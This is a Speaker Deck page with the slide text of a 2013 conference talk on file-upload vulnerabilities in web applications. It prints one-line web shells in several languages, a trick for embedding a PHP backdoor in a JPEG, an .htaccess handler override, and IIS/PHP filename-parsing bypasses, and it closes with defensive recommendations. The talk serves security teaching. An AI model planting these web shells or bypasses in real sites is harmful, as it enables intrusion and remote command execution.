Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Best Practices - The Upload

Orange
August 21, 2024
0
16

Best Practices - The Upload

Webconf 2013

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Security in PHP 那些在滲透測試的小技巧
p8361
0
21
網頁安全 Web Security 入門
p8361
0
28
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k

Featured

See All Featured
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
27
4.2k
Code Review Best Practice
trishagee
64
17k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
Build The Right Thing And Hit Your Dates
maggiecrowley
32
2.4k
Bash Introduction
62gerente
608
210k
Learning to Love Humans: Emotional Interface Design
aarron
272
40k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
664
120k
Navigating Team Friction
lara
183
14k
KATA
mclloyd
29
13k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
355
29k
What's in a price? How to price your products and services
michaelherold
243
12k
The World Runs on Bad Software
bkeepers
PRO
65
11k

Transcript

  1. 2013/01/13 @ WebConf <[email protected]>

  2. • aka Orange • 2009 • 2011, 2012 • 2011

    AVTOKYO • 2012 PHP Conf • 2012 VXRLConf • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • Disclosed – MS12-071

    / CVE-2012-4775 • http://blog.orange.tw/
  4. None
  5. None

  6. 1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.

    Scanning – SYN/ACK Scan, TCP NULL/FIN/Xmas/Mainmon/Window Scan, SCTP INIT Scan, Hydra, Nessus …… 3. Gaining Access – Heap/Stack/V-table Overflow, ROP, Heap Spray, System Misconfiguration, Metasploit, Exploit Database …… 4. Maintaining Access – Privilege Escalation, Trojan, Backdoor, Rootkit, Code/DLL Injection, API Hook, LD_PRELOAD, Anti AV/Debugger …… 5. Clearing Tracks – Syslog, WTMP/UTMP, Event Log, Shell(Bash/Explorer) ……
  7. None

  8. – Upload? – Web log? Dabase log?

  9. • • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd

    ) – <%eval request("cmd") %> – __import__('os').system(cmd)

  10. https://github.com/evilcos/python-webshell/

  11. None
  12. None
  13. None
  14. None
  15. None
  16. None
  17. None

  18. http://www.lu-chen.com/

  19. None
  20. None

  21. • – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login

    • – /userfiles/mypic.jpg – /userfiles/mypic.jpg/nihao.php

  22. • – Huffman table – EXIF • – copy /b

    rst.jpg+backdoor.php dst.jpg • – http://orange.tw/exif.jpg
  23. None
  24. None

  25. • • • •

  26. • – – – • – php phtml php3 php4

    php5 – asp asa cer cdx shtml – aspx asax ascx ashx asmx http://www.hitcon.org/download/2010/5_Flash Exploit.pdf#Page.20
  27. None

  28. – AddHandler application/x-httpd-php .jpg • – .php*

  29. None

  30. https://speakerdeck.com/allenown/the-internet-is-not-safe-webconf-taiwan-2013

  31. https://www.facebook.com/TWWDB

  32. (htaccess ^ ^)

  33. • • – user.jpg  .jpg – user.php.jpg  .jpg

    – user.php.xxx  .php – user.php.xxx.ooo  .php
  34. None

  35. • – IIS < 7 – Asp.net ^__< • –

    http://webconf.orange.tw/files/a.asp/user.jpg • – http://webconf.orange.tw/files/user.asp;aa.jpg user.asp;aa.jpg
  36. None
  37. None

  38. filename Content-Type File header

  39. None

  40. • Update your sense and software. • User controlled filename

    is always dangerous. – Whatever filename, extension or temporary filename. • Use Image library to valid or strip the image. • Disabled the directory’s execution permission you uploaded to.

  41. • • – htaccess • – Apache – IIS •

  42. None

  43. Q & A

  44. [email protected]